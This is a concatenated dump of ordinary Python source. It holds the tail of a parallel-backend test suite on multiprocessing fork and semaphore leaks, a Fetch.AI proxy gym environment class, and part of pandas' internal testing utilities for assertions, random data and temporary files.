            print(out, err)

    @linux_only
    @skip_unless_py3
    def test_serial_parent_explicit_mp_fork_par_child_then_par_parent(self):
        """
        Explicit use of multiprocessing 'fork'.
        Does this:
        1. Start with no OpenMP
        2. Fork to processes using OpenMP
        3. Join forks
        4. Run some OpenMP
        """
        body = """if 1:
            X = np.arange(1000000.)
            Y = np.arange(1000000.)
            q = multiprocessing.Queue()

            # this is ok
            procs = []
            ctx = multiprocessing.get_context('fork')
            for x in range(10):
                # fork() underneath with but no OpenMP in parent, this is ok
                proc = ctx.Process(target = busy_func, args=(X, Y, q))
                procs.append(proc)
                proc.start()

            [p.join() for p in procs]

            # and this is still ok as the OpenMP happened in forks
            Z = busy_func(X, Y, q)

            try:
                q.get(False)
            except multiprocessing.queues.Empty:
                pass
            else:
                raise RuntimeError("Queue was not empty")
        """
        runme = self.template % body
        cmdline = [sys.executable, '-c', runme]
        out, err = self.run_cmd(cmdline)
        if self._DEBUG:
            print(out, err)
@parfors_skip_unsupported
class TestInitSafetyIssues(TestCase):
    # Checks that importing/initialising the parallel backends does not leak
    # OS resources into child processes.

    _DEBUG = False

    @linux_only  # only linux can leak semaphores
    @skip_unless_py3  # need multiprocessing.get_context to obtain spawn on linux
    def test_orphaned_semaphore(self):
        # sys path injection and separate usecase module to make sure everything
        # is importable by children of multiprocessing
        def run_cmd(cmdline):
            # Run the child; kill it after _TEST_TIMEOUT seconds; return
            # decoded (stdout, stderr) or raise on non-zero exit.
            popen = subprocess.Popen(cmdline,
                                     stdout=subprocess.PIPE,
                                     stderr=subprocess.PIPE,)
            # finish in _TEST_TIMEOUT seconds or kill it
            timeout = threading.Timer(_TEST_TIMEOUT, popen.kill)
            try:
                timeout.start()
                out, err = popen.communicate()
                if popen.returncode != 0:
                    raise AssertionError(
                        "process failed with code %s: stderr follows\n%s\n" %
                        (popen.returncode, err.decode()))
            finally:
                timeout.cancel()
            return out.decode(), err.decode()

        test_file = os.path.join(os.path.dirname(__file__),
                                 "orphaned_semaphore_usecase.py")
        cmdline = [sys.executable, test_file]
        out, err = run_cmd(cmdline)

        # assert no semaphore leaks reported on stderr
        self.assertNotIn("leaked semaphore", err)

        if self._DEBUG:
            print("OUT:", out)
            print("ERR:", err)
if __name__ == '__main__':
unittest.main()
|
env.py | # -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2022 Valory AG
# Copyright 2018-2021 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""This contains the proxy gym environment."""
import sys
import time
from queue import Queue
from threading import Thread
from typing import Any, Optional, Tuple, cast
import gym
from aea.common import Address
from aea.helpers.base import locate
from aea.mail.base import Envelope
from aea.protocols.base import Message
from aea.protocols.dialogue.base import Dialogue as BaseDialogue
sys.modules["packages.fetchai.connections.gym"] = locate( # isort:skip
"packages.fetchai.connections.gym"
)
sys.modules["packages.fetchai.protocols.gym"] = locate( # isort:skip
"packages.fetchai.protocols.gym"
)
from packages.fetchai.connections.gym.connection import ( # noqa: E402 # pylint: disable=wrong-import-position
PUBLIC_ID as GYM_CONNECTION_PUBLIC_ID,
)
from packages.fetchai.protocols.gym.dialogues import ( # noqa: E402 # pylint: disable=wrong-import-position
GymDialogue as BaseGymDialogue,
)
from packages.fetchai.protocols.gym.dialogues import ( # noqa: E402 # pylint: disable=wrong-import-position
GymDialogues as BaseGymDialogues,
)
from packages.fetchai.protocols.gym.message import ( # noqa: E402 # pylint: disable=wrong-import-position
GymMessage,
)
from .agent import ProxyAgent # noqa: E402 # pylint: disable=wrong-import-position
# Type aliases mirroring the standard gym step() return types.
Action = Any
Observation = Any
Reward = float
Done = bool
Info = dict
Feedback = Tuple[Observation, Reward, Done, Info]

# Re-export the protocol dialogue classes under local names.
GymDialogue = BaseGymDialogue
GymDialogues = BaseGymDialogues
def role_from_first_message(  # pylint: disable=unused-argument
    message: Message, receiver_address: Address
) -> BaseDialogue.Role:
    """Infer the role of the agent from an incoming/outgoing first message.

    :param message: an incoming/outgoing first message
    :param receiver_address: the address of the receiving agent
    :return: The role of the agent
    """
    # The proxy environment always plays the AGENT role in gym dialogues.
    return BaseGymDialogue.Role.AGENT
class ProxyEnv(gym.Env):
    """This class implements a proxy gym environment."""

    def __init__(self, gym_env: gym.Env) -> None:
        """
        Instantiate the proxy environment.

        :param gym_env: gym environment
        """
        super().__init__()
        # Queue through which the proxy agent hands envelopes back to us.
        self._queue: Queue = Queue()
        self._action_counter: int = 0
        self.gym_address = str(GYM_CONNECTION_PUBLIC_ID)
        self._agent = ProxyAgent(
            name="proxy", gym_env=gym_env, proxy_env_queue=self._queue
        )
        self._agent_thread = Thread(target=self._agent.start)
        self._active_dialogue = None  # type: Optional[GymDialogue]
        self.gym_skill = "fetchai/gym:0.1.0"
        self.gym_dialogues = GymDialogues(self.gym_skill, role_from_first_message)

    @property
    def active_dialogue(self) -> GymDialogue:
        """Get the active dialogue."""
        return self._active_dialogue

    def step(self, action: Action) -> Feedback:
        """
        Run one time-step of the environment's dynamics.

        Mirrors the standard 'step' method of a gym environment.

        - The action is given to _encode_action, which does the necessary conversion to an envelope.
        - The envelope is given to the outbox of the proxy agent.
        - The method blocks until the _queue returns an envelope.
        - The envelope is decoded with _decode_percept to a message.
        - The message is converted into the standard observation, reward, done and info via _message_to_percept

        :param action: the action sent to the step method (e.g. the output of an RL algorithm)
        :return: a Tuple containing the Feedback of Observation, Reward, Done and Info
        """
        self._action_counter += 1
        step_id = self._action_counter

        self._encode_and_send_action(action, step_id)

        # Wait (blocking!) for the response envelope from the environment
        in_envelope = self._queue.get(block=True, timeout=None)  # type: Envelope

        msg = self._decode_percept(in_envelope, step_id)

        observation, reward, done, info = self._message_to_percept(msg)

        return observation, reward, done, info

    def render(self, mode="human") -> None:
        """
        Render the environment.

        :param mode: the run mode
        """
        # Reach through the proxy agent to the real wrapped gym environment.
        self._agent.runtime.multiplexer.default_connection.channel.gym_env.render(mode)

    def reset(self) -> None:
        """Reset the environment."""
        if not self._agent.runtime.multiplexer.is_connected:
            self._connect()
        gym_msg, gym_dialogue = self.gym_dialogues.create(
            counterparty=self.gym_address, performative=GymMessage.Performative.RESET,
        )
        gym_dialogue = cast(GymDialogue, gym_dialogue)
        self._active_dialogue = gym_dialogue
        self._agent.outbox.put_message(message=gym_msg)

        # Wait (blocking!) for the response envelope from the environment
        in_envelope = self._queue.get(block=True, timeout=None)  # type: GymMessage

        self._decode_status(in_envelope)

    def close(self) -> None:
        """Close the environment."""
        last_msg = self.active_dialogue.last_message
        if last_msg is None:
            raise ValueError("Cannot retrieve last message.")
        gym_msg = self.active_dialogue.reply(
            performative=GymMessage.Performative.CLOSE, target_message=last_msg,
        )
        self._agent.outbox.put_message(message=gym_msg)

        self._disconnect()

    def _connect(self):
        """Connect to this proxy environment. It starts a proxy agent that can interact with the framework."""
        if self._agent_thread is not None and self._agent_thread.is_alive():
            raise ValueError("Agent already running.")
        if self._agent_thread is None:
            # FIX: _disconnect() discards the finished thread (sets it to
            # None); build a fresh one so the environment can be connected
            # again after close() instead of raising AttributeError.
            self._agent_thread = Thread(target=self._agent.start)
        self._agent_thread.start()

        while not self._agent.runtime.is_running:  # check agent completely running
            time.sleep(0.01)

    def _disconnect(self):
        """Disconnect from this proxy environment. It stops the proxy agent and kills its thread."""
        self._agent.stop()
        self._agent_thread.join()
        self._agent_thread = None

    def _encode_and_send_action(self, action: Action, step_id: int) -> None:
        """
        Encode the 'action' sent to the step function and send.

        :param action: the action that is the output of an RL algorithm.
        :param step_id: the step id
        """
        last_msg = self.active_dialogue.last_message
        if last_msg is None:
            raise ValueError("Cannot retrieve last message.")
        gym_msg = self.active_dialogue.reply(
            performative=GymMessage.Performative.ACT,
            target_message=last_msg,
            action=GymMessage.AnyObject(action),
            step_id=step_id,
        )
        # Send the message via the proxy agent and to the environment
        self._agent.outbox.put_message(message=gym_msg)

    def _decode_percept(self, envelope: Envelope, expected_step_id: int) -> GymMessage:
        """
        Receive the response from the gym environment in the form of an envelope and decode it.

        The response is a PERCEPT message containing the usual 'observation', 'reward', 'done', 'info' parameters.

        :param envelope: the envelope
        :param expected_step_id: the expected step id
        :return: a message received as a response to the action performed in apply_action.
        """
        if envelope is not None:
            if (
                envelope.protocol_specification_id
                == GymMessage.protocol_specification_id
            ):
                gym_msg = cast(GymMessage, envelope.message)
                gym_dialogue = self.gym_dialogues.update(gym_msg)
                if not gym_dialogue:
                    # FIX: error message previously misspelled "udpate"
                    raise ValueError("Could not update dialogue.")
                if not gym_dialogue == self.active_dialogue:
                    raise ValueError("Dialogue does not match.")
                if (
                    gym_msg.performative == GymMessage.Performative.PERCEPT
                    and gym_msg.step_id == expected_step_id
                ):
                    return gym_msg
                raise ValueError(
                    "Unexpected performative or no step_id: {}".format(
                        gym_msg.performative
                    )
                )
            raise ValueError(
                "Unknown protocol_specification_id: {}".format(
                    envelope.protocol_specification_id
                )
            )
        raise ValueError("Missing envelope.")

    def _decode_status(self, envelope: Envelope) -> None:
        """
        Receive the response from the gym environment in the form of an envelope and decode it.

        The response is a STATUS message.

        :param envelope: the envelope
        :return: a message received as a response to the action performed in apply_action.
        """
        if envelope is not None:
            if (
                envelope.protocol_specification_id
                == GymMessage.protocol_specification_id
            ):
                gym_msg = cast(GymMessage, envelope.message)
                gym_dialogue = self.gym_dialogues.update(gym_msg)
                if not gym_dialogue:
                    # FIX: error message previously misspelled "udpate"
                    raise ValueError("Could not update dialogue.")
                if not gym_dialogue == self.active_dialogue:
                    raise ValueError("Dialogue does not match.")
                if (
                    gym_msg.performative == GymMessage.Performative.STATUS
                    and gym_msg.content.get("reset", "failure") == "success"
                ):
                    return None
                raise ValueError(
                    "Unexpected performative or no step_id: {}".format(
                        gym_msg.performative
                    )
                )
            raise ValueError(
                "Unknown protocol_id: {}".format(envelope.protocol_specification_id)
            )
        raise ValueError("Missing envelope.")

    @staticmethod
    def _message_to_percept(message: GymMessage) -> Feedback:
        """
        Transform the message received from the gym environment into observation, reward, done, info.

        :param message: the message received as a response to the action performed in apply_action.
        :return: the standard feedback (observation, reward, done, info) of a gym environment.
        """
        observation = cast(Any, message.observation.any)
        reward = cast(float, message.reward)
        done = cast(bool, message.done)
        info = cast(dict, message.info.any)

        return observation, reward, done, info
|
_testing.py | import bz2
from collections import Counter
from contextlib import contextmanager
from datetime import datetime
from functools import wraps
import gzip
import operator
import os
from shutil import rmtree
import string
import tempfile
from typing import Any, Callable, ContextManager, List, Optional, Type, Union, cast
import warnings
import zipfile
import numpy as np
from numpy.random import rand, randn
from pandas._config.localization import ( # noqa:F401
can_set_locale,
get_locales,
set_locale,
)
from pandas._libs.lib import no_default
import pandas._libs.testing as _testing
from pandas._typing import Dtype, FilePathOrBuffer, FrameOrSeries
from pandas.compat import _get_lzma_file, _import_lzma
from pandas.core.dtypes.common import (
is_bool,
is_categorical_dtype,
is_datetime64_dtype,
is_datetime64tz_dtype,
is_extension_array_dtype,
is_interval_dtype,
is_number,
is_numeric_dtype,
is_period_dtype,
is_sequence,
is_timedelta64_dtype,
needs_i8_conversion,
)
from pandas.core.dtypes.missing import array_equivalent
import pandas as pd
from pandas import (
Categorical,
CategoricalIndex,
DataFrame,
DatetimeIndex,
Index,
IntervalIndex,
MultiIndex,
RangeIndex,
Series,
bdate_range,
)
from pandas.core.algorithms import take_1d
from pandas.core.arrays import (
DatetimeArray,
ExtensionArray,
IntervalArray,
PeriodArray,
TimedeltaArray,
period_array,
)
from pandas.core.arrays.datetimelike import DatetimeLikeArrayMixin
from pandas.io.common import urlopen
from pandas.io.formats.printing import pprint_thing
# lzma handle resolved via pandas.compat — presumably None/absent-safe when the
# interpreter was built without lzma support; TODO confirm against pandas.compat
lzma = _import_lzma()
# NOTE(review): _N/_K look like default sizes for data-generation helpers
# defined later in this module — confirm against makeDataFrame and friends
_N = 30
_K = 4
_RAISE_NETWORK_ERROR_DEFAULT = False
# dtype groups used to parametrize tests across the numpy / pandas type system;
# *_EA_* lists are the nullable pandas extension dtypes (capitalized names)
UNSIGNED_INT_DTYPES: List[Dtype] = ["uint8", "uint16", "uint32", "uint64"]
UNSIGNED_EA_INT_DTYPES: List[Dtype] = ["UInt8", "UInt16", "UInt32", "UInt64"]
SIGNED_INT_DTYPES: List[Dtype] = [int, "int8", "int16", "int32", "int64"]
SIGNED_EA_INT_DTYPES: List[Dtype] = ["Int8", "Int16", "Int32", "Int64"]
ALL_INT_DTYPES = UNSIGNED_INT_DTYPES + SIGNED_INT_DTYPES
ALL_EA_INT_DTYPES = UNSIGNED_EA_INT_DTYPES + SIGNED_EA_INT_DTYPES
FLOAT_DTYPES: List[Dtype] = [float, "float32", "float64"]
COMPLEX_DTYPES: List[Dtype] = [complex, "complex64", "complex128"]
STRING_DTYPES: List[Dtype] = [str, "str", "U"]
DATETIME64_DTYPES: List[Dtype] = ["datetime64[ns]", "M8[ns]"]
TIMEDELTA64_DTYPES: List[Dtype] = ["timedelta64[ns]", "m8[ns]"]
BOOL_DTYPES = [bool, "bool"]
BYTES_DTYPES = [bytes, "bytes"]
OBJECT_DTYPES = [object, "object"]
# composite groups built from the atomic lists above
ALL_REAL_DTYPES = FLOAT_DTYPES + ALL_INT_DTYPES
ALL_NUMPY_DTYPES = (
    ALL_REAL_DTYPES
    + COMPLEX_DTYPES
    + STRING_DTYPES
    + DATETIME64_DTYPES
    + TIMEDELTA64_DTYPES
    + BOOL_DTYPES
    + OBJECT_DTYPES
    + BYTES_DTYPES
)
# set testing_mode
# warning categories toggled on/off by the PANDAS_TESTING_MODE environment
# variable (see set_testing_mode / reset_testing_mode below)
_testing_mode_warnings = (DeprecationWarning, ResourceWarning)
def set_testing_mode():
    """Enable testing-mode warning filters when PANDAS_TESTING_MODE asks for it."""
    if "deprecate" in os.environ.get("PANDAS_TESTING_MODE", "None"):
        warnings.simplefilter("always", _testing_mode_warnings)


def reset_testing_mode():
    """Undo the warning filters installed by :func:`set_testing_mode`."""
    if "deprecate" in os.environ.get("PANDAS_TESTING_MODE", "None"):
        warnings.simplefilter("ignore", _testing_mode_warnings)


set_testing_mode()
def reset_display_options():
    """Restore every ``display.*`` option to its default value."""
    pd.reset_option("^display.", silent=True)
def round_trip_pickle(
    obj: Any, path: Optional[FilePathOrBuffer] = None
) -> FrameOrSeries:
    """
    Pickle an object, read it back, and return the re-read object.

    Parameters
    ----------
    obj : any object
        The object to pickle and then re-read.
    path : str, path object or file-like object, default None
        Where to write/read the pickle; a random temp name is used when None.

    Returns
    -------
    pandas object
        The object obtained from un-pickling.
    """
    pickle_path = f"__{rands(10)}__.pickle" if path is None else path
    with ensure_clean(pickle_path) as tmp:
        pd.to_pickle(obj, tmp)
        return pd.read_pickle(tmp)
def round_trip_pathlib(writer, reader, path: Optional[str] = None):
    """
    Write an object to file specified by a pathlib.Path and read it back.

    Parameters
    ----------
    writer : callable bound to pandas object
        IO writing function (e.g. DataFrame.to_csv )
    reader : callable
        IO reading function (e.g. pd.read_csv )
    path : str, default None
        The path where the object is written and then read.

    Returns
    -------
    pandas object
        The original object that was serialized and then re-read.
    """
    # pathlib is part of the standard library on all supported Pythons, so a
    # plain import suffices; the previous pytest.importorskip("pathlib") pulled
    # in pytest at runtime for no benefit.
    from pathlib import Path

    if path is None:
        path = "___pathlib___"
    with ensure_clean(path) as path:
        writer(Path(path))
        obj = reader(Path(path))
    return obj
def round_trip_localpath(writer, reader, path: Optional[str] = None):
    """
    Write an object to a py.path LocalPath, read it back, and return it.

    Parameters
    ----------
    writer : callable bound to pandas object
        IO writing function (e.g. DataFrame.to_csv )
    reader : callable
        IO reading function (e.g. pd.read_csv )
    path : str, default None
        The path where the object is written and then read.

    Returns
    -------
    pandas object
        The object produced by ``reader`` after the round trip.
    """
    import pytest

    # py.path is an optional third-party dependency; skip the test when absent
    LocalPath = pytest.importorskip("py.path").local
    path = "___localpath___" if path is None else path
    with ensure_clean(path) as path:
        writer(LocalPath(path))
        obj = reader(LocalPath(path))
    return obj
@contextmanager
def decompress_file(path, compression):
    """
    Open a compressed file and yield a binary file object.

    Parameters
    ----------
    path : str
        The path where the file is read from.
    compression : {'gzip', 'bz2', 'zip', 'xz', None}
        Name of the decompression to use

    Yields
    ------
    file object

    Raises
    ------
    ValueError
        On an unknown compression name, or a ZIP archive holding more than
        one member.
    """
    zip_file = None
    if compression == "zip":
        # ZIP needs special handling: keep the archive handle so it can be
        # closed after the member file object is closed.
        zip_file = zipfile.ZipFile(path)
        members = zip_file.namelist()
        if len(members) != 1:
            raise ValueError(f"ZIP file {path} error. Only one file per ZIP.")
        f = zip_file.open(members[0])
    elif compression is None:
        f = open(path, "rb")
    elif compression == "gzip":
        f = gzip.open(path, "rb")
    elif compression == "bz2":
        f = bz2.BZ2File(path, "rb")
    elif compression == "xz":
        f = _get_lzma_file(lzma)(path, "rb")
    else:
        raise ValueError(f"Unrecognized compression type: {compression}")
    try:
        yield f
    finally:
        f.close()
        if zip_file is not None:
            zip_file.close()
def write_to_compressed(compression, path, data, dest="test"):
    """
    Write data to a compressed file.

    Parameters
    ----------
    compression : {'gzip', 'bz2', 'zip', 'xz'}
        The compression type to use.
    path : str
        The file path to write the data.
    data : str
        The data to write.
    dest : str, default "test"
        The destination file (for ZIP only)

    Raises
    ------
    ValueError : An invalid compression value was passed in.
    """
    # ZIP stores data under a member name via writestr; every other format
    # writes the raw payload directly.
    if compression == "zip":
        compress_method, mode, method, args = zipfile.ZipFile, "w", "writestr", (dest, data)
    elif compression == "gzip":
        compress_method, mode, method, args = gzip.GzipFile, "wb", "write", (data,)
    elif compression == "bz2":
        compress_method, mode, method, args = bz2.BZ2File, "wb", "write", (data,)
    elif compression == "xz":
        compress_method, mode, method, args = _get_lzma_file(lzma), "wb", "write", (data,)
    else:
        raise ValueError(f"Unrecognized compression type: {compression}")
    with compress_method(path, mode=mode) as f:
        getattr(f, method)(*args)
def _get_tol_from_less_precise(check_less_precise: Union[bool, int]) -> float:
"""
Return the tolerance equivalent to the deprecated `check_less_precise`
parameter.
Parameters
----------
check_less_precise : bool or int
Returns
-------
float
Tolerance to be used as relative/absolute tolerance.
Examples
--------
>>> # Using check_less_precise as a bool:
>>> _get_tol_from_less_precise(False)
0.5e-5
>>> _get_tol_from_less_precise(True)
0.5e-3
>>> # Using check_less_precise as an int representing the decimal
>>> # tolerance intended:
>>> _get_tol_from_less_precise(2)
0.5e-2
>>> _get_tol_from_less_precise(8)
0.5e-8
"""
if isinstance(check_less_precise, bool):
if check_less_precise:
# 3-digit tolerance
return 0.5e-3
else:
# 5-digit tolerance
return 0.5e-5
else:
# Equivalent to setting checking_less_precise=<decimals>
return 0.5 * 10 ** -check_less_precise
def assert_almost_equal(
    left,
    right,
    check_dtype: Union[bool, str] = "equiv",
    check_less_precise: Union[bool, int] = no_default,
    rtol: float = 1.0e-5,
    atol: float = 1.0e-8,
    **kwargs,
):
    """
    Check that the left and right objects are approximately equal.

    By approximately equal, we refer to objects that are numbers or that
    contain numbers which may be equivalent to specific levels of precision.

    Parameters
    ----------
    left : object
    right : object
    check_dtype : bool or {'equiv'}, default 'equiv'
        Check dtype if both a and b are the same type. If 'equiv' is passed in,
        then `RangeIndex` and `Int64Index` are also considered equivalent
        when doing type checking.
    check_less_precise : bool or int, default False
        Specify comparison precision. 5 digits (False) or 3 digits (True)
        after decimal points are compared. If int, then specify the number
        of digits to compare.

        When comparing two numbers, if the first number has magnitude less
        than 1e-5, we compare the two numbers directly and check whether
        they are equivalent within the specified precision. Otherwise, we
        compare the **ratio** of the second number to the first number and
        check whether it is equivalent to 1 within the specified precision.

        .. deprecated:: 1.1.0
           Use `rtol` and `atol` instead to define relative/absolute
           tolerance, respectively. Similar to :func:`math.isclose`.
    rtol : float, default 1e-5
        Relative tolerance.

        .. versionadded:: 1.1.0
    atol : float, default 1e-8
        Absolute tolerance.

        .. versionadded:: 1.1.0
    """
    if check_less_precise is not no_default:
        # translate the deprecated parameter into equivalent rtol/atol values;
        # stacklevel=2 attributes the warning to the direct caller
        warnings.warn(
            "The 'check_less_precise' keyword in testing.assert_*_equal "
            "is deprecated and will be removed in a future version. "
            "You can stop passing 'check_less_precise' to silence this warning.",
            FutureWarning,
            stacklevel=2,
        )
        rtol = atol = _get_tol_from_less_precise(check_less_precise)
    # dispatch to the specialized comparator by the type of `left`;
    # check_exact=False in each case since this function compares approximately
    if isinstance(left, pd.Index):
        assert_index_equal(
            left,
            right,
            check_exact=False,
            exact=check_dtype,
            rtol=rtol,
            atol=atol,
            **kwargs,
        )
    elif isinstance(left, pd.Series):
        assert_series_equal(
            left,
            right,
            check_exact=False,
            check_dtype=check_dtype,
            rtol=rtol,
            atol=atol,
            **kwargs,
        )
    elif isinstance(left, pd.DataFrame):
        assert_frame_equal(
            left,
            right,
            check_exact=False,
            check_dtype=check_dtype,
            rtol=rtol,
            atol=atol,
            **kwargs,
        )
    else:
        # Other sequences.
        if check_dtype:
            if is_number(left) and is_number(right):
                # Do not compare numeric classes, like np.float64 and float.
                pass
            elif is_bool(left) and is_bool(right):
                # Do not compare bool classes, like np.bool_ and bool.
                pass
            else:
                if isinstance(left, np.ndarray) or isinstance(right, np.ndarray):
                    obj = "numpy array"
                else:
                    obj = "Input"
                assert_class_equal(left, right, obj=obj)
        # fall back to the low-level comparison helper for everything else
        _testing.assert_almost_equal(
            left, right, check_dtype=check_dtype, rtol=rtol, atol=atol, **kwargs
        )
def _check_isinstance(left, right, cls):
"""
Helper method for our assert_* methods that ensures that
the two objects being compared have the right type before
proceeding with the comparison.
Parameters
----------
left : The first object being compared.
right : The second object being compared.
cls : The class type to check against.
Raises
------
AssertionError : Either `left` or `right` is not an instance of `cls`.
"""
cls_name = cls.__name__
if not isinstance(left, cls):
raise AssertionError(
f"{cls_name} Expected type {cls}, found {type(left)} instead"
)
if not isinstance(right, cls):
raise AssertionError(
f"{cls_name} Expected type {cls}, found {type(right)} instead"
)
def assert_dict_equal(left, right, compare_keys: bool = True):
    """
    Assert that two dicts hold equal contents.

    Parameters
    ----------
    left : dict
    right : dict
    compare_keys : bool, default True
        Passed through to the pandas._libs.testing comparison helper.

    Raises
    ------
    AssertionError : inputs are not both dicts, or their contents differ.
    """
    # validate types first so a non-dict input gives a clear message
    _check_isinstance(left, right, dict)
    _testing.assert_dict_equal(left, right, compare_keys=compare_keys)
def randbool(size=(), p: float = 0.5):
    """Return a random boolean array where each entry is True with probability *p*."""
    draws = rand(*size)
    return draws <= p
# pool of single ASCII alphanumeric characters used by rands/rands_array
RANDS_CHARS = np.array(list(string.ascii_letters + string.digits), dtype=(np.str_, 1))
# pool of non-ASCII characters (U+05D0.. Hebrew block) plus digits, used by
# randu_array to generate unicode strings
RANDU_CHARS = np.array(
    list("".join(map(chr, range(1488, 1488 + 26))) + string.digits),
    dtype=(np.unicode_, 1),
)
def rands_array(nchars, size, dtype="O"):
    """
    Generate an array of random ASCII strings, each of length ``nchars``.
    """
    # draw all characters at once, then view as fixed-width strings
    flat = np.random.choice(RANDS_CHARS, size=nchars * np.prod(size))
    strings = flat.view((np.str_, nchars)).reshape(size)
    return strings.astype(dtype)
def randu_array(nchars, size, dtype="O"):
    """
    Generate an array of random unicode strings, each of length ``nchars``.
    """
    # draw all characters at once, then view as fixed-width strings
    flat = np.random.choice(RANDU_CHARS, size=nchars * np.prod(size))
    strings = flat.view((np.unicode_, nchars)).reshape(size)
    return strings.astype(dtype)
def rands(nchars):
    """
    Generate one random ASCII string of length ``nchars``.

    See `rands_array` if you want to create an array of random strings.
    """
    chars = np.random.choice(RANDS_CHARS, nchars)
    return "".join(chars)
def close(fignum=None):
    """Close the given matplotlib figure, or every open figure when ``fignum`` is None."""
    from matplotlib.pyplot import close as _close, get_fignums

    if fignum is not None:
        _close(fignum)
    else:
        for num in get_fignums():
            _close(num)
# -----------------------------------------------------------------------------
# contextmanager to ensure the file cleanup
@contextmanager
def ensure_clean(filename=None, return_filelike=False, **kwargs):
    """
    Gets a temporary path and agrees to remove on close.

    Parameters
    ----------
    filename : str (optional)
        if None, creates a temporary file which is then removed when out of
        scope. if passed, creates temporary file with filename as ending.
    return_filelike : bool (default False)
        if True, returns a file-like which is *always* cleaned. Necessary for
        savefig and other functions which want to append extensions.
    **kwargs
        Additional keywords passed in for creating a temporary file.
        :meth:`tempFile.TemporaryFile` is used when `return_filelike` is ``True``.
        :meth:`tempfile.mkstemp` is used when `return_filelike` is ``False``.
        Note that the `filename` parameter will be passed in as the `suffix`
        argument to either function.

    See Also
    --------
    tempfile.TemporaryFile
    tempfile.mkstemp
    """
    filename = filename or ""
    fd = None
    # the requested filename becomes the suffix of the generated temp name
    kwargs["suffix"] = filename
    if return_filelike:
        f = tempfile.TemporaryFile(**kwargs)
        try:
            yield f
        finally:
            f.close()
    else:
        # Don't generate tempfile if using a path with directory specified.
        if len(os.path.dirname(filename)):
            raise ValueError("Can't pass a qualified name to ensure_clean()")
        try:
            fd, filename = tempfile.mkstemp(**kwargs)
        except UnicodeEncodeError:
            import pytest

            pytest.skip("no unicode file names on this system")
        try:
            yield filename
        finally:
            try:
                os.close(fd)
            except OSError:
                # BUG FIX: the message previously printed a literal placeholder
                # instead of interpolating the temp file's name
                print(f"Couldn't close file descriptor: {fd} (file: {filename})")
            try:
                if os.path.exists(filename):
                    os.remove(filename)
            except OSError as e:
                print(f"Exception on removing file: {e}")
@contextmanager
def ensure_clean_dir():
    """
    Yield a temporary directory path that is removed when the context exits.

    Yields
    ------
    Temporary directory path
    """
    path = tempfile.mkdtemp(suffix="")
    try:
        yield path
    finally:
        # best-effort cleanup; the directory may already be gone
        try:
            rmtree(path)
        except OSError:
            pass
@contextmanager
def ensure_safe_environment_variables():
    """
    Context manager that snapshots os.environ and restores it on exit.

    Any environment variables set or modified inside the block neither
    persist nor change global state.
    """
    snapshot = dict(os.environ)
    try:
        yield
    finally:
        os.environ.clear()
        os.environ.update(snapshot)
# -----------------------------------------------------------------------------
# Comparators
def equalContents(arr1, arr2) -> bool:
    """
    Check whether arr1 and arr2 contain the same set of unique elements.
    """
    return set(arr1) == set(arr2)
def assert_index_equal(
    left: Index,
    right: Index,
    exact: Union[bool, str] = "equiv",
    check_names: bool = True,
    check_less_precise: Union[bool, int] = no_default,
    check_exact: bool = True,
    check_categorical: bool = True,
    rtol: float = 1.0e-5,
    atol: float = 1.0e-8,
    obj: str = "Index",
) -> None:
    """
    Check that left and right Index are equal.

    Parameters
    ----------
    left : Index
    right : Index
    exact : bool or {'equiv'}, default 'equiv'
        Whether to check the Index class, dtype and inferred_type
        are identical. If 'equiv', then RangeIndex can be substituted for
        Int64Index as well.
    check_names : bool, default True
        Whether to check the names attribute.
    check_less_precise : bool or int, default False
        Specify comparison precision. Only used when check_exact is False.
        5 digits (False) or 3 digits (True) after decimal points are compared.
        If int, then specify the digits to compare.

        .. deprecated:: 1.1.0
           Use `rtol` and `atol` instead to define relative/absolute
           tolerance, respectively. Similar to :func:`math.isclose`.
    check_exact : bool, default True
        Whether to compare number exactly.
    check_categorical : bool, default True
        Whether to compare internal Categorical exactly.
    rtol : float, default 1e-5
        Relative tolerance. Only used when check_exact is False.

        .. versionadded:: 1.1.0
    atol : float, default 1e-8
        Absolute tolerance. Only used when check_exact is False.

        .. versionadded:: 1.1.0
    obj : str, default 'Index'
        Specify object name being compared, internally used to show appropriate
        assertion message.
    """
    __tracebackhide__ = True

    def _check_types(l, r, obj="Index"):
        if exact:
            assert_class_equal(l, r, exact=exact, obj=obj)
            # Skip exact dtype checking when `check_categorical` is False
            if check_categorical:
                assert_attr_equal("dtype", l, r, obj=obj)
            # allow string-like to have different inferred_types
            # BUG FIX: ("string") is a plain str, so `in` did a substring
            # match; a one-element tuple gives a real membership test
            if l.inferred_type in ("string",):
                assert r.inferred_type in ("string",)
            else:
                assert_attr_equal("inferred_type", l, r, obj=obj)

    def _get_ilevel_values(index, level):
        # accept level number only
        unique = index.levels[level]
        level_codes = index.codes[level]
        filled = take_1d(unique._values, level_codes, fill_value=unique._na_value)
        values = unique._shallow_copy(filled, name=index.names[level])
        return values

    if check_less_precise is not no_default:
        warnings.warn(
            "The 'check_less_precise' keyword in testing.assert_*_equal "
            "is deprecated and will be removed in a future version. "
            "You can stop passing 'check_less_precise' to silence this warning.",
            FutureWarning,
            stacklevel=2,
        )
        rtol = atol = _get_tol_from_less_precise(check_less_precise)

    # instance validation
    _check_isinstance(left, right, Index)

    # class / dtype comparison
    _check_types(left, right, obj=obj)

    # level comparison
    if left.nlevels != right.nlevels:
        msg1 = f"{obj} levels are different"
        msg2 = f"{left.nlevels}, {left}"
        msg3 = f"{right.nlevels}, {right}"
        raise_assert_detail(obj, msg1, msg2, msg3)

    # length comparison
    if len(left) != len(right):
        msg1 = f"{obj} length are different"
        msg2 = f"{len(left)}, {left}"
        msg3 = f"{len(right)}, {right}"
        raise_assert_detail(obj, msg1, msg2, msg3)

    # MultiIndex special comparison for little-friendly error messages
    if left.nlevels > 1:
        left = cast(MultiIndex, left)
        right = cast(MultiIndex, right)
        for level in range(left.nlevels):
            # cannot use get_level_values here because it can change dtype
            llevel = _get_ilevel_values(left, level)
            rlevel = _get_ilevel_values(right, level)
            lobj = f"MultiIndex level [{level}]"
            assert_index_equal(
                llevel,
                rlevel,
                exact=exact,
                check_names=check_names,
                check_exact=check_exact,
                rtol=rtol,
                atol=atol,
                obj=lobj,
            )
